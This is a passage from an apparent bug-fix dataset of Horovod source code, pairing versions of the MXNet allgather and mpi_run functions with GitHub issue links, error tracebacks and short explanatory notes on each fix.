Tue Oct 13 10:58:58 2020[3]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:58 2020[1]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:59 2020[3]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:59 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:59 2020[3]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:59 2020[3]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[2]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[1]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[1]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:59:00 2020[1]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:59:00 2020[2]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
|
UnicodeDecodeError
|
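Note on the write() pair above (issue 2367): the after_merge version writes the rank-prefix context separately instead of routing everything through prepend_context. The traceback shows the underlying failure mode: forward_stream read the child's output in fixed-size chunks and called text.decode('utf-8') on each chunk in isolation, so a multibyte UTF-8 character split across a chunk boundary raised "unexpected end of data". A minimal sketch of the general remedy, using Python's incremental decoder (the function name and the 1000-byte chunk size are illustrative assumptions, not Horovod's API):

import codecs
import io

def forward_bytes(src, dst, chunk_size=1000):
    # An incremental decoder buffers the trailing bytes of an incomplete
    # multibyte sequence instead of raising UnicodeDecodeError.
    decoder = codecs.getincrementaldecoder("utf-8")(errors="replace")
    while True:
        chunk = src.read(chunk_size)
        if not chunk:
            dst.write(decoder.decode(b"", final=True))  # flush buffered tail
            break
        dst.write(decoder.decode(chunk))

# A 2-byte character straddling the chunk boundary now decodes cleanly:
src = io.BytesIO(("x" * 999 + "é").encode("utf-8"))
dst = io.StringIO()
forward_bytes(src, dst)
assert dst.getvalue() == "x" * 999 + "é"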
def allgather(tensor, name=None, priority=0):
"""
A function that concatenates the input tensor with the same input tensor on
all other Horovod processes. The input tensor is not modified.
The concatenation is done on the first dimension, so the input tensors on
the different processes must have the same rank and shape, except for the
first dimension, which is allowed to be different.
This acts as a thin wrapper around an autograd function. If your input
tensor requires gradients, then calling this function will allow gradients
to be computed and backpropagated.
Arguments:
tensor: A tensor to allgather.
name: A name of the allgather operation.
priority: The priority of this operation. Higher priority operations
are likely to be executed before other operations.
Returns:
A tensor of the same type as `tensor`, concatenated on dimension zero
across all processes. The shape is identical to the input shape, except
for the first dimension, which may be greater and is the sum of all
first dimensions of the tensors in different Horovod processes.
"""
assert isinstance(tensor, mx.nd.NDArray)
# Size of output is unknown, create output array that
# will be resized during Horovod operation
output = mx.nd.empty(shape=[1], ctx=tensor.context, dtype=tensor.dtype)
c_in = tensor.handle
c_out = output.handle
if isinstance(name, string_types):
check_call(
MPI_MXNET_LIB_CTYPES.horovod_mxnet_allgather_async(
c_in, c_out, c_str(name), ctypes.c_int(priority)
)
)
else:
check_call(
MPI_MXNET_LIB_CTYPES.horovod_mxnet_allgather_async(
c_in, c_out, name, ctypes.c_int(priority)
)
)
# Need to block here so changes to output tensor are visible
output.wait_to_read()
return output
|
def allgather(tensor, name=None, priority=0):
"""
A function that concatenates the input tensor with the same input tensor on
all other Horovod processes. The input tensor is not modified.
The concatenation is done on the first dimension, so the input tensors on
the different processes must have the same rank and shape, except for the
first dimension, which is allowed to be different.
This acts as a thin wrapper around an autograd function. If your input
tensor requires gradients, then calling this function will allow gradients
to be computed and backpropagated.
Arguments:
tensor: A tensor to allgather.
name: A name of the allgather operation.
priority: The priority of this operation. Higher priority operations
are likely to be executed before other operations.
Returns:
A tensor of the same type as `tensor`, concatenated on dimension zero
across all processes. The shape is identical to the input shape, except
for the first dimension, which may be greater and is the sum of all
first dimensions of the tensors in different Horovod processes.
"""
assert isinstance(tensor, mx.nd.NDArray)
output = mx.nd.zeros(shape=tensor.shape, ctx=tensor.context, dtype=tensor.dtype)
c_in = tensor.handle
c_out = output.handle
if isinstance(name, string_types):
check_call(
MPI_MXNET_LIB_CTYPES.horovod_mxnet_allgather_async(
c_in, c_out, c_str(name), ctypes.c_int(priority)
)
)
else:
check_call(
MPI_MXNET_LIB_CTYPES.horovod_mxnet_allgather_async(
c_in, c_out, name, ctypes.c_int(priority)
)
)
return output
|
https://github.com/horovod/horovod/issues/1669
|
(before) a.shape = (10, 100, 100)
(before) a[0]=
[[0.6686509 0.17409194 0.3850025 ... 0.43011498 0.0661214 0.2502998 ]
[0.7005292 0.19000232 0.6673837 ... 0.27718288 0.16084558 0.223108 ]
[0.96042585 0.81086403 0.54152083 ... 0.5650488 0.5196334 0.6767488 ]
...
[0.96879214 0.9387428 0.04036242 ... 0.13176239 0.3436321 0.47154343]
[0.8069018 0.91234195 0.01141495 ... 0.35816687 0.57390726 0.68393874]
[0.72049534 0.67948174 0.44702923 ... 0.87448525 0.63809574 0.7006303 ]]
<NDArray 100x100 @gpu(0)>
(after) a.shape = (10, 100, 100)
(before) a.shape = (10, 100, 100)
(before) a[0]=
[[0.7685592 0.10232276 0.8685353 ... 0.93769354 0.62144864 0.21535844]
[0.85973674 0.3420865 0.6202223 ... 0.5464046 0.41442537 0.32170743]
[0.11786121 0.23281038 0.95843846 ... 0.17739207 0.5901362 0.28355032]
...
[0.70749086 0.61171615 0.37854642 ... 0.3485002 0.29636437 0.7359518 ]
[0.4345038 0.90834665 0.5242443 ... 0.0793817 0.40161872 0.6579807 ]
[0.8531954 0.18177992 0.7053579 ... 0.5257004 0.24457276 0.74836564]]
<NDArray 100x100 @gpu(1)>
(after) a.shape = (10, 100, 100)
Traceback (most recent call last):
File "all_gather_bug.py", line 29, in <module>
print("(after) a[0]={}".format(a[0]))
File "/opt/mxnet/python/mxnet/ndarray/ndarray.py", line 194, in __repr__
return '\n%s\n<%s %s @%s>' % (str(self.asnumpy()),
File "/opt/mxnet/python/mxnet/ndarray/ndarray.py", line 1996, in asnumpy
ctypes.c_size_t(data.size)))
File "/opt/mxnet/python/mxnet/base.py", line 252, in check_call
raise MXNetError(py_str(_LIB.MXGetLastError()))
mxnet.base.MXNetError: MPI_Allgatherv failed, see MPI output for details.
Traceback (most recent call last):
File "all_gather_bug.py", line 29, in <module>
print("(after) a[0]={}".format(a[0]))
File "/opt/mxnet/python/mxnet/ndarray/ndarray.py", line 194, in __repr__
return '\n%s\n<%s %s @%s>' % (str(self.asnumpy()),
File "/opt/mxnet/python/mxnet/ndarray/ndarray.py", line 1996, in asnumpy
ctypes.c_size_t(data.size)))
File "/opt/mxnet/python/mxnet/base.py", line 252, in check_call
raise MXNetError(py_str(_LIB.MXGetLastError()))
mxnet.base.MXNetError: MPI_Allgatherv failed, see MPI output for details.
--------------------------------------------------------------------------
Primary job terminated normally, but 1 process returned
a non-zero exit code. Per user-direction, the job has been aborted.
--------------------------------------------------------------------------
--------------------------------------------------------------------------
mpiexec detected that one or more processes exited with non-zero status, thus causing
the job to be terminated. The first process to do so was:
Process name: [[59002,1],1]
Exit code: 1
|
mxnet.base.MXNetError
|
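Note on the allgather pair above (issue 1669): the before_merge version preallocated the output NDArray with the input tensor's shape, but allgather's output first dimension is the sum of the first dimensions across all workers, so the native MPI_Allgatherv call failed as in the log. The after_merge version hands the op a one-element placeholder that Horovod resizes during the operation, then blocks with output.wait_to_read() so the resized result is visible before use. A hedged usage sketch (assumes a working horovod.mxnet build, launched under horovodrun or mpirun):

import mxnet as mx
import horovod.mxnet as hvd

hvd.init()
ctx = mx.gpu(hvd.local_rank()) if mx.context.num_gpus() > 0 else mx.cpu()
a = mx.nd.random.uniform(shape=(10, 100, 100), ctx=ctx)
gathered = hvd.allgather(a)
# With the fix, the first dimension is the sum over all workers:
print(gathered.shape)  # (10 * hvd.size(), 100, 100)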
def mpi_run(settings, nics, env, command, stdout=None, stderr=None):
"""
Runs mpi_run.
Args:
settings: Settings for running MPI.
Note: settings.num_proc and settings.hosts must not be None.
nics: Interfaces to include by MPI.
env: Environment dictionary to use for running command.
command: Command and arguments to run as a list of string.
stdout: Stdout of the mpi process.
Only used when settings.run_func_mode is True.
stderr: Stderr of the mpi process.
Only used when settings.run_func_mode is True.
"""
if env is not None and not isinstance(env, dict):
raise Exception(
"env argument must be a dict, not {type}: {env}".format(
type=type(env), env=env
)
)
mpi_impl_flags, impl_binding_args = _get_mpi_implementation_flags(
settings.tcp_flag, env=env
)
if mpi_impl_flags is None:
raise Exception(_MPI_NOT_FOUND_ERROR_MSG)
ssh_port_arg = (
'-mca plm_rsh_args "-p {ssh_port}"'.format(ssh_port=settings.ssh_port)
if settings.ssh_port
else ""
)
# if user does not specify any hosts, mpirun by default uses local host.
# There is no need to specify localhost.
hosts_arg = "-H {hosts}".format(hosts=settings.hosts)
tcp_intf_arg = (
"-mca btl_tcp_if_include {nics}".format(nics=",".join(nics)) if nics else ""
)
nccl_socket_intf_arg = (
"-x NCCL_SOCKET_IFNAME={nics}".format(nics=",".join(nics)) if nics else ""
)
# On large cluster runs (e.g. Summit), we need extra settings to work around OpenMPI issues
if settings.num_hosts and settings.num_hosts >= _LARGE_CLUSTER_THRESHOLD:
mpi_impl_flags.append("-mca plm_rsh_no_tree_spawn true")
mpi_impl_flags.append(
"-mca plm_rsh_num_concurrent {}".format(settings.num_hosts)
)
binding_args = (
settings.binding_args if settings.binding_args else " ".join(impl_binding_args)
)
# Pass all the env variables to the mpirun command.
mpirun_command = (
"mpirun --allow-run-as-root --tag-output "
"-np {num_proc} {hosts_arg} "
"{binding_args} "
"{mpi_args} "
"{ssh_port_arg} "
"{tcp_intf_arg} "
"{nccl_socket_intf_arg} "
"{output_filename_arg} "
"{env} {extra_mpi_args} {command}".format( # expect a lot of environment variables
num_proc=settings.num_proc,
hosts_arg=hosts_arg,
binding_args=binding_args,
mpi_args=" ".join(mpi_impl_flags),
tcp_intf_arg=tcp_intf_arg,
nccl_socket_intf_arg=nccl_socket_intf_arg,
ssh_port_arg=ssh_port_arg,
output_filename_arg="--output-filename " + settings.output_filename
if settings.output_filename
else "",
env=" ".join(
"-x %s" % key
for key in sorted(env.keys())
if env_util.is_exportable(key)
),
extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
command=" ".join(quote(par) for par in command),
)
)
if settings.verbose >= 2:
print(mpirun_command)
# we need the driver's PATH and PYTHONPATH in env to run mpirun,
# env for mpirun is different to env encoded in mpirun_command
for var in ["PATH", "PYTHONPATH"]:
if var not in env and var in os.environ:
# copy env so we do not leak env modifications
env = copy.copy(env)
# copy var over from os.environ
env[var] = os.environ[var]
# Execute the mpirun command.
if settings.run_func_mode:
exit_code = safe_shell_exec.execute(
mpirun_command, env=env, stdout=stdout, stderr=stderr
)
if exit_code != 0:
raise RuntimeError(
"mpirun failed with exit code {exit_code}".format(exit_code=exit_code)
)
else:
os.execve("/bin/sh", ["/bin/sh", "-c", mpirun_command], env)
|
def mpi_run(settings, nics, env, command, stdout=None, stderr=None):
"""
Runs mpi_run.
Args:
settings: Settings for running MPI.
Note: settings.num_proc and settings.hosts must not be None.
nics: Interfaces to include by MPI.
env: Environment dictionary to use for running command.
command: Command and arguments to run as a list of string.
stdout: Stdout of the mpi process.
Only used when settings.run_func_mode is True.
stderr: Stderr of the mpi process.
Only used when settings.run_func_mode is True.
"""
if env is not None and not isinstance(env, dict):
raise Exception(
"env argument must be a dict, not {type}: {env}".format(
type=type(env), env=env
)
)
mpi_impl_flags, impl_binding_args = _get_mpi_implementation_flags(
settings.tcp_flag, env=env
)
if mpi_impl_flags is None:
raise Exception(_MPI_NOT_FOUND_ERROR_MSG)
ssh_port_arg = (
'-mca plm_rsh_args "-p {ssh_port}"'.format(ssh_port=settings.ssh_port)
if settings.ssh_port
else ""
)
# if user does not specify any hosts, mpirun by default uses local host.
# There is no need to specify localhost.
hosts_arg = "-H {hosts}".format(hosts=settings.hosts)
tcp_intf_arg = (
"-mca btl_tcp_if_include {nics}".format(nics=",".join(nics)) if nics else ""
)
nccl_socket_intf_arg = (
"-x NCCL_SOCKET_IFNAME={nics}".format(nics=",".join(nics)) if nics else ""
)
# On large cluster runs (e.g. Summit), we need extra settings to work around OpenMPI issues
if settings.num_hosts and settings.num_hosts >= _LARGE_CLUSTER_THRESHOLD:
mpi_impl_flags.append("-mca plm_rsh_no_tree_spawn true")
mpi_impl_flags.append(
"-mca plm_rsh_num_concurrent {}".format(settings.num_hosts)
)
binding_args = (
settings.binding_args if settings.binding_args else " ".join(impl_binding_args)
)
# Pass all the env variables to the mpirun command.
mpirun_command = (
"mpirun --allow-run-as-root --tag-output "
"-np {num_proc} {hosts_arg} "
"{binding_args} "
"{mpi_args} "
"{ssh_port_arg} "
"{tcp_intf_arg} "
"{nccl_socket_intf_arg} "
"{output_filename_arg} "
"{env} {extra_mpi_args} {command}".format( # expect a lot of environment variables
num_proc=settings.num_proc,
hosts_arg=hosts_arg,
binding_args=binding_args,
mpi_args=" ".join(mpi_impl_flags),
tcp_intf_arg=tcp_intf_arg,
nccl_socket_intf_arg=nccl_socket_intf_arg,
ssh_port_arg=ssh_port_arg,
output_filename_arg="--output-filename " + settings.output_filename
if settings.output_filename
else "",
env=" ".join(
"-x %s" % key
for key in sorted(env.keys())
if env_util.is_exportable(key)
),
extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
command=" ".join(quote(par) for par in command),
)
)
if settings.verbose >= 2:
print(mpirun_command)
# we need the driver's PATH in env to run mpirun,
# env for mpirun is different to env encoded in mpirun_command
if "PATH" not in env and "PATH" in os.environ:
env = copy.copy(env) # copy env so we do not leak env modifications
env["PATH"] = os.environ["PATH"]
# Execute the mpirun command.
if settings.run_func_mode:
exit_code = safe_shell_exec.execute(
mpirun_command, env=env, stdout=stdout, stderr=stderr
)
if exit_code != 0:
raise RuntimeError(
"mpirun failed with exit code {exit_code}".format(exit_code=exit_code)
)
else:
os.execve("/bin/sh", ["/bin/sh", "-c", mpirun_command], env)
|
https://github.com/horovod/horovod/issues/2033
|
File "/usr/lib/python3.7/runpy.py", line 183, in _run_module_as_main
mod_name, mod_spec, code = _get_module_details(mod_name, _Error)
File "/usr/lib/python3.7/runpy.py", line 109, in _get_module_details
__import__(pkg_name)
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/__init__.py", line 18, in <module>
from .runner import run
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/runner.py", line 20, in <module>
import pyspark
ModuleNotFoundError: No module named 'pyspark'
--------------------------------------------------------------------------
ORTE was unable to reliably start one or more daemons.
This usually is caused by:
...
--------------------------------------------------------------------------
Exception in thread Thread-3:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "/usr/lib/python3.7/threading.py", line 870, in run
self._target(*self._args, **self._kwargs)
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/runner.py", line 100, in run_spark
result = procs.mapPartitionsWithIndex(_make_mapper(driver.addresses(), settings, use_gloo)).collect()
File "/home/weichen.xu/spark-3.0.0-preview2-bin-hadoop2.7/python/pyspark/rdd.py", line 889, in collect
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
File "/home/weichen.xu/spark-3.0.0-preview2-bin-hadoop2.7/python/lib/py4j-0.10.8.1-src.zip/py4j/java_gateway.py", line 1286, in __call__
answer, self.gateway_client, self.target_id, self.name)
File "/home/weichen.xu/spark-3.0.0-preview2-bin-hadoop2.7/python/pyspark/sql/utils.py", line 98, in deco
return f(*a, **kw)
File "/home/weichen.xu/spark-3.0.0-preview2-bin-hadoop2.7/python/lib/py4j-0.10.8.1-src.zip/py4j/protocol.py", line 328, in get_return_value
format(target_id, ".", name), value)
py4j.protocol.Py4JJavaError: An error occurred while calling z:org.apache.spark.api.python.PythonRDD.collectAndServe.
: org.apache.spark.SparkException: Job 0 cancelled part of cancelled job group horovod.spark.run.0
at org.apache.spark.scheduler.DAGScheduler.failJobAndIndependentStages(DAGScheduler.scala:1989)
at org.apache.spark.scheduler.DAGScheduler.handleJobCancellation(DAGScheduler.scala:1924)
at org.apache.spark.scheduler.DAGScheduler.$anonfun$handleJobGroupCancelled$4(DAGScheduler.scala:937)
at scala.runtime.java8.JFunction1$mcVI$sp.apply(JFunction1$mcVI$sp.java:23)
at scala.collection.mutable.HashSet.foreach(HashSet.scala:79)
at org.apache.spark.scheduler.DAGScheduler.handleJobGroupCancelled(DAGScheduler.scala:936)
at org.apache.spark.scheduler.DAGSchedulerEventProcessLoop.doOnReceive(DAGScheduler.scala:2175)
at org.apache.spark.scheduler.DAGSchedulerEventProcessLoop.onReceive(DAGScheduler.scala:2155)
at org.apache.spark.scheduler.DAGSchedulerEventProcessLoop.onReceive(DAGScheduler.scala:2144)
at org.apache.spark.util.EventLoop$$anon$1.run(EventLoop.scala:49)
at org.apache.spark.scheduler.DAGScheduler.runJob(DAGScheduler.scala:758)
at org.apache.spark.SparkContext.runJob(SparkContext.scala:2116)
at org.apache.spark.SparkContext.runJob(SparkContext.scala:2137)
at org.apache.spark.SparkContext.runJob(SparkContext.scala:2156)
at org.apache.spark.SparkContext.runJob(SparkContext.scala:2181)
at org.apache.spark.rdd.RDD.$anonfun$collect$1(RDD.scala:1004)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:151)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:112)
at org.apache.spark.rdd.RDD.withScope(RDD.scala:388)
at org.apache.spark.rdd.RDD.collect(RDD.scala:1003)
at org.apache.spark.api.python.PythonRDD$.collectAndServe(PythonRDD.scala:168)
at org.apache.spark.api.python.PythonRDD.collectAndServe(PythonRDD.scala)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at py4j.reflection.MethodInvoker.invoke(MethodInvoker.java:244)
at py4j.reflection.ReflectionEngine.invoke(ReflectionEngine.java:357)
at py4j.Gateway.invoke(Gateway.java:282)
at py4j.commands.AbstractCommand.invokeMethod(AbstractCommand.java:132)
at py4j.commands.CallCommand.execute(CallCommand.java:79)
at py4j.GatewayConnection.run(GatewayConnection.java:238)
at java.lang.Thread.run(Thread.java:748)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/runner.py", line 227, in run
_launch_job(use_mpi, use_gloo, settings, driver, env, stdout, stderr)
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/runner.py", line 123, in _launch_job
settings.verbose)
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/run/runner.py", line 686, in run_controller
mpi_run()
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/runner.py", line 121, in <lambda>
use_mpi, lambda: mpi_run(settings, nics, driver, env, stdout, stderr),
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/mpi_run.py", line 54, in mpi_run
hr_mpi_run(settings, nics, env, command, stdout=stdout, stderr=stderr)
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/run/mpi_run.py", line 201, in mpi_run
raise RuntimeError("mpirun failed with exit code {exit_code}".format(exit_code=exit_code))
RuntimeError: mpirun failed with exit code 1
20/06/18 05:40:55 WARN PythonRunner: Incomplete task 0.0 in stage 0 (TID 0) interrupted: Attempting to kill Python Worker
20/06/18 05:40:55 WARN PythonRunner: Incomplete task 1.0 in stage 0 (TID 1) interrupted: Attempting to kill Python Worker
20/06/18 05:40:56 WARN TaskSetManager: Lost task 1.0 in stage 0.0 (TID 1, ip-10-20-4-87.us-west-2.compute.internal, executor driver): TaskKilled (Stage cancelled)
20/06/18 05:40:56 WARN TaskSetManager: Lost task 0.0 in stage 0.0 (TID 0, ip-10-20-4-87.us-west-2.compute.internal, executor driver): TaskKilled (Stage cancelled)
|
ModuleNotFoundError
|
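Note on the mpi_run pair above (issue 2033): the fix generalizes the env pass-through from PATH alone to both PATH and PYTHONPATH. The traceback shows why: when horovod.spark shells out to mpirun, the Python processes ORTE starts inherit the environment given to mpirun, and without the driver's PYTHONPATH they cannot import pyspark. A small sketch of the same copy-through pattern (with_driver_vars is an illustrative name, not part of Horovod):

import copy
import os

def with_driver_vars(env, names=("PATH", "PYTHONPATH")):
    # Copy env before the first modification so the caller's dict is
    # never mutated; only fill in variables the caller did not set.
    for var in names:
        if var not in env and var in os.environ:
            env = copy.copy(env)
            env[var] = os.environ[var]
    return env

child_env = with_driver_vars({"HOROVOD_LOG_LEVEL": "info"})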
def mpi_run(settings, nics, env, command, stdout=None, stderr=None):
"""
Runs mpi_run.
Args:
settings: Settings for running MPI.
Note: settings.num_proc and settings.hosts must not be None.
nics: Interfaces to include by MPI.
env: Environment dictionary to use for running command.
command: Command and arguments to run as a list of string.
stdout: Stdout of the mpi process.
Only used when settings.run_func_mode is True.
stderr: Stderr of the mpi process.
Only used when settings.run_func_mode is True.
"""
if env is not None and not isinstance(env, dict):
raise Exception(
"env argument must be a dict, not {type}: {env}".format(
type=type(env), env=env
)
)
mpi_impl_flags, impl_binding_args = _get_mpi_implementation_flags(
settings.tcp_flag, env=env
)
if mpi_impl_flags is None:
raise Exception(_MPI_NOT_FOUND_ERROR_MSG)
ssh_port_arg = (
'-mca plm_rsh_args "-p {ssh_port}"'.format(ssh_port=settings.ssh_port)
if settings.ssh_port
else ""
)
# if user does not specify any hosts, mpirun by default uses local host.
# There is no need to specify localhost.
hosts_arg = "-H {hosts}".format(hosts=settings.hosts)
tcp_intf_arg = (
"-mca btl_tcp_if_include {nics}".format(nics=",".join(nics)) if nics else ""
)
nccl_socket_intf_arg = (
"-x NCCL_SOCKET_IFNAME={nics}".format(nics=",".join(nics)) if nics else ""
)
# On large cluster runs (e.g. Summit), we need extra settings to work around OpenMPI issues
if settings.num_hosts and settings.num_hosts >= _LARGE_CLUSTER_THRESHOLD:
mpi_impl_flags.append("-mca plm_rsh_no_tree_spawn true")
mpi_impl_flags.append(
"-mca plm_rsh_num_concurrent {}".format(settings.num_hosts)
)
binding_args = (
settings.binding_args if settings.binding_args else " ".join(impl_binding_args)
)
# Pass all the env variables to the mpirun command.
mpirun_command = (
"mpirun --allow-run-as-root --tag-output "
"-np {num_proc} {hosts_arg} "
"{binding_args} "
"{mpi_args} "
"{ssh_port_arg} "
"{tcp_intf_arg} "
"{nccl_socket_intf_arg} "
"{output_filename_arg} "
"{env} {extra_mpi_args} {command}".format( # expect a lot of environment variables
num_proc=settings.num_proc,
hosts_arg=hosts_arg,
binding_args=binding_args,
mpi_args=" ".join(mpi_impl_flags),
tcp_intf_arg=tcp_intf_arg,
nccl_socket_intf_arg=nccl_socket_intf_arg,
ssh_port_arg=ssh_port_arg,
output_filename_arg="--output-filename " + settings.output_filename
if settings.output_filename
else "",
env=" ".join(
"-x %s" % key
for key in sorted(env.keys())
if env_util.is_exportable(key)
),
extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
command=" ".join(quote(par) for par in command),
)
)
if settings.verbose >= 2:
print(mpirun_command)
# we need the driver's PATH in env to run mpirun,
# env for mpirun is different to env encoded in mpirun_command
if "PATH" not in env and "PATH" in os.environ:
env = copy.copy(env) # copy env so we do not leak env modifications
env["PATH"] = os.environ["PATH"]
# Execute the mpirun command.
if settings.run_func_mode:
exit_code = safe_shell_exec.execute(
mpirun_command, env=env, stdout=stdout, stderr=stderr
)
if exit_code != 0:
raise RuntimeError(
"mpirun failed with exit code {exit_code}".format(exit_code=exit_code)
)
else:
os.execve("/bin/sh", ["/bin/sh", "-c", mpirun_command], env)
|
def mpi_run(settings, nics, env, command, stdout=None, stderr=None):
"""
Runs mpi_run.
Args:
settings: Settings for running MPI.
Note: settings.num_proc and settings.hosts must not be None.
nics: Interfaces to include by MPI.
env: Environment dictionary to use for running command.
command: Command and arguments to run as a list of string.
stdout: Stdout of the mpi process.
Only used when settings.run_func_mode is True.
stderr: Stderr of the mpi process.
Only used when settings.run_func_mode is True.
"""
mpi_impl_flags, impl_binding_args = _get_mpi_implementation_flags(
settings.tcp_flag, env=env
)
if mpi_impl_flags is None:
raise Exception(_MPI_NOT_FOUND_ERROR_MSG)
ssh_port_arg = (
'-mca plm_rsh_args "-p {ssh_port}"'.format(ssh_port=settings.ssh_port)
if settings.ssh_port
else ""
)
# if user does not specify any hosts, mpirun by default uses local host.
# There is no need to specify localhost.
hosts_arg = "-H {hosts}".format(hosts=settings.hosts)
tcp_intf_arg = (
"-mca btl_tcp_if_include {nics}".format(nics=",".join(nics)) if nics else ""
)
nccl_socket_intf_arg = (
"-x NCCL_SOCKET_IFNAME={nics}".format(nics=",".join(nics)) if nics else ""
)
# On large cluster runs (e.g. Summit), we need extra settings to work around OpenMPI issues
if settings.num_hosts and settings.num_hosts >= _LARGE_CLUSTER_THRESHOLD:
mpi_impl_flags.append("-mca plm_rsh_no_tree_spawn true")
mpi_impl_flags.append(
"-mca plm_rsh_num_concurrent {}".format(settings.num_hosts)
)
binding_args = (
settings.binding_args if settings.binding_args else " ".join(impl_binding_args)
)
# Pass all the env variables to the mpirun command.
mpirun_command = (
"mpirun --allow-run-as-root --tag-output "
"-np {num_proc} {hosts_arg} "
"{binding_args} "
"{mpi_args} "
"{ssh_port_arg} "
"{tcp_intf_arg} "
"{nccl_socket_intf_arg} "
"{output_filename_arg} "
"{env} {extra_mpi_args} {command}".format( # expect a lot of environment variables
num_proc=settings.num_proc,
hosts_arg=hosts_arg,
binding_args=binding_args,
mpi_args=" ".join(mpi_impl_flags),
tcp_intf_arg=tcp_intf_arg,
nccl_socket_intf_arg=nccl_socket_intf_arg,
ssh_port_arg=ssh_port_arg,
output_filename_arg="--output-filename " + settings.output_filename
if settings.output_filename
else "",
env=" ".join(
"-x %s" % key
for key in sorted(env.keys())
if env_util.is_exportable(key)
),
extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
command=" ".join(quote(par) for par in command),
)
)
if settings.verbose >= 2:
print(mpirun_command)
# we need the driver's PATH in env to run mpirun,
# env for mpirun is different to env encoded in mpirun_command
if "PATH" not in env and "PATH" in os.environ:
env = copy.copy(env) # copy env so we do not leak env modifications
env["PATH"] = os.environ["PATH"]
# Execute the mpirun command.
if settings.run_func_mode:
exit_code = safe_shell_exec.execute(
mpirun_command, env=env, stdout=stdout, stderr=stderr
)
if exit_code != 0:
raise RuntimeError(
"mpirun failed with exit code {exit_code}".format(exit_code=exit_code)
)
else:
os.execve("/bin/sh", ["/bin/sh", "-c", mpirun_command], env)
|
https://github.com/horovod/horovod/issues/2037
|
Traceback (most recent call last):
